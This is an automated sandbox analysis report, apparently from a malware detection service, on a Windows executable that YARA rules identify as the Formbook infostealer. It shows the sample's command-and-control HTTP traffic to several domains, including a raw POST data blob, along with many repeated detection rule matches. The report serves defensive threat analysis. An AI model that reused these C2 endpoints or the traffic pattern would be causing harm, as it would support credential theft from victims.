HTTP traffic detected: POST /uem3/ HTTP/1.1Host: www.astrofrance.onlineConnection: closeContent-Length: 713Cache-Control: no-cacheOrigin: http://www.astrofrance.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.astrofrance.online/uem3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 70 45 3d 75 79 4a 4b 44 46 49 35 4d 75 6f 6c 6a 78 77 75 75 67 65 32 63 37 50 52 4e 49 46 74 4b 6d 61 64 4e 4f 78 41 57 78 5a 37 42 42 64 70 4a 61 71 71 38 4c 50 42 57 74 74 78 30 78 6b 2d 4c 4e 76 54 55 51 50 30 44 49 72 31 59 54 52 67 31 38 6d 41 37 55 57 43 6f 36 48 64 67 68 6e 73 31 79 32 57 55 4e 28 66 43 51 75 56 31 4f 46 51 34 35 6f 32 7e 4a 46 77 38 74 31 66 5a 61 67 4b 61 49 5a 57 71 64 32 64 35 4e 52 30 56 37 57 7a 6b 44 73 65 58 68 4b 63 48 72 61 4f 70 71 38 35 58 6f 75 57 4d 33 78 5a 49 6e 56 39 44 45 6a 68 43 5a 4a 72 4a 6c 46 42 6c 6e 45 4b 6c 59 4f 38 77 41 72 4a 79 75 52 78 47 6b 31 71 4c 75 6e 50 39 33 39 47 64 55 4a 32 59 6a 33 46 4e 74 54 50 4b 6f 48 6f 61 4c 70 52 31 6d 74 46 4b 75 44 70 67 4b 4a 47 59 44 42 61 51 47 39 37 7e 65 7a 30 65 55 34 72 78 72 7a 4d 6d 6e 59 68 52 30 46 50 6b 6e 74 67 75 57 36 31 39 63 54 7a 71 34 67 6f 32 57 39 4b 6b 74 59 4f 4a 47 6d 6b 36 6b 35 79 4e 4c 4c 4e 6a 64 51 44 44 66 72 6d 6a 54 71 47 43 62 31 46 6f 47 55 68 49 4b 7e 67 50 76 32 78 57 5a 61 63 31 49 52 56 34 63 62 70 4a 33 70 4b 4c 61 6d 4b 34 75 6e 34 37 75 6d 71 39 75 50 58 6b 51 4c 67 65 35 30 72 61 71 76 71 42 5f 45 75 44 43 54 62 43 7a 5a 46 4e 63 7a 58 31 67 74 77 31 56 47 68 7e 74 34 77 62 6a 74 2d 64 69 7a 42 72 77 62 56 6f 64 45 68 79 6a 6b 78 7a 43 6c 75 28 54 6e 76 6d 4c 35 69 4d 73 41 53 50 68 48 45 43 53 67 69 66 69 66 55 5a 4c 4b 33 66 6e 39 58 48 6d 30 45 5a 4c 49 67 68 5a 64 6d 5a 5a 6b 36 32 2d 68 6d 65 44 33 6a 37 51 6e 63 49 76 6d 62 6a 2d 73 5a 41 48 74 32 6e 6f 4c 32 7e 47 51 2d 35 65 77 7a 38 6a 4f 41 44 63 53 41 49 43 4e 44 36 55 64 71 6e 62 56 71 4e 47 7a 35 7a 43 79 5f 47 4f 4c 78 79 6f 4f 6b 68 4c 58 45 4d 51 28 56 71 30 71 63 47 5f 71 39 32 74 78 71 48 49 74 6b 50 56 73 33 72 39 44 4d 42 4c 68 68 6c 61 76 30 67 59 6b 45 34 6c 33 68 38 72 6f 5f 59 63 63 38 4d 37 43 57 7e 5f 46 78 76 51 55 53 4a 79 63 5f 44 66 65 4e 68 69 45 47 68 78 6a 66 67 79 41 43 74 54 42 4e 4b 6c 42 45 56 63 54 75 32 4b 30 37 53 63 79 48 67 75 79 33 6f 58 56 52 36 75 6b 74 47 37 39 69 52 5a 32 48 41 53 50 56 34 55 73 43 28 31 52 4d 59 2d 4b 71 53 57 4a 32 34 52 51 30 73 6e 62 77 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=uyJKDFI5Muoljxwuuge2c7PRNIFtKmadNOxAWxZ7BBdpJaqq8LPBWttx0xk-LNvTUQP0DIr1YTRg18mA7UWCo6Hdghns1y2WUN(fCQuV1OFQ45o2~JFw8t1fZagKaIZWqd2d5NR0V7WzkDseXhKcHraOpq85XouWM3xZInV9DEjhCZJrJlFBlnEKlYO8wArJyuRxGk1qLunP939GdUJ2Yj3FNtTPKoHoaLpR1mtFKuDpgKJGYDBaQG97~ez0eU4rxrzMmnYhR0FPkntguW619cTzq4go2W9KktYOJGmk6k5yNLLNjdQDDfrmjTqGCb1FoGUhIK~gPv2xWZac1IRV4cbpJ3pKLamK4un47umq9uPXkQLge50raqvqB_EuDCTbCzZFNczX1gtw1VGh~t4w

Source: unknown

DNS traffic detected: queries for: www.timinis23.com

Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=0e5ylS0mR5Iv24OzcR2s4uNeaAp+yJmWD1izpzSJBOsV3UDfR6yWX1PKUNeuwqbGEXMx HTTP/1.1Host: www.timinis23.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?BpE=hw9wdlgRPJgu6mhEw3v3abu2JdZhLnzfTKsoEzFZGCpKAu6wx+OREaAyoHMqAY/6AEPW&SH=IDKTKDM HTTP/1.1Host: www.astrofrance.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=V2TDWYSqi/8fdllEzj4AbTg97NFaRkku6BamUZomS0y+YREnVG6xukPcgSdf2jxlzQp6 HTTP/1.1Host: www.domainedelapoujade.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=e7lgbbJx7/LPlk8h2XTeLpVDgGYjKiXPdD9XuQrM1srGI3PqQ6DhnuaFHJpKRw83QeNd HTTP/1.1Host: www.homesteaddesignstudio.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?BpE=Kc68PjQ5YLKhI5YJGbmTtSVcH4y3rSoSs1SAKTtyyAoVNP+YqbFEGdxEoFZf0m2HIavw&SH=IDKTKDM HTTP/1.1Host: www.xjyjjy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /uem3/?SH=IDKTKDM&BpE=4t2Z3lNwjnLZlDwEEC0m8LkRlQI0Pl9ucZSXJIF5IRDrQEKlG6sw6AjHC30zWhIZsVHq HTTP/1.1Host: www.duckholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: e6o7hKFmfC.exe, 00000000.00000002.459110568.00000000012C0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.e6o7hKFmfC.exe.2fb56d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: e6o7hKFmfC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.e6o7hKFmfC.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.e6o7hKFmfC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.e6o7hKFmfC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.e6o7hKFmfC.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.e6o7hKFmfC.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.e6o7hKFmfC.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.e6o7hKFmfC.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.e6o7hKFmfC.exe.2fb56d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.e6o7hKFmfC.exe.3fc6e58.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.703057541.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.455184548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.703514050.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.527437534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.527732322.0000000000BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.527662253.0000000000A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.454684714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.495550893.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.513448398.000000000E9FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.465620003.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.702688779.0000000000390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_00B92050	0_2_00B92050
Source: C:\Users\user\Desktop\e6o7hKFmfC.exe	Code function: 0_2_01213880	0_2_01213880
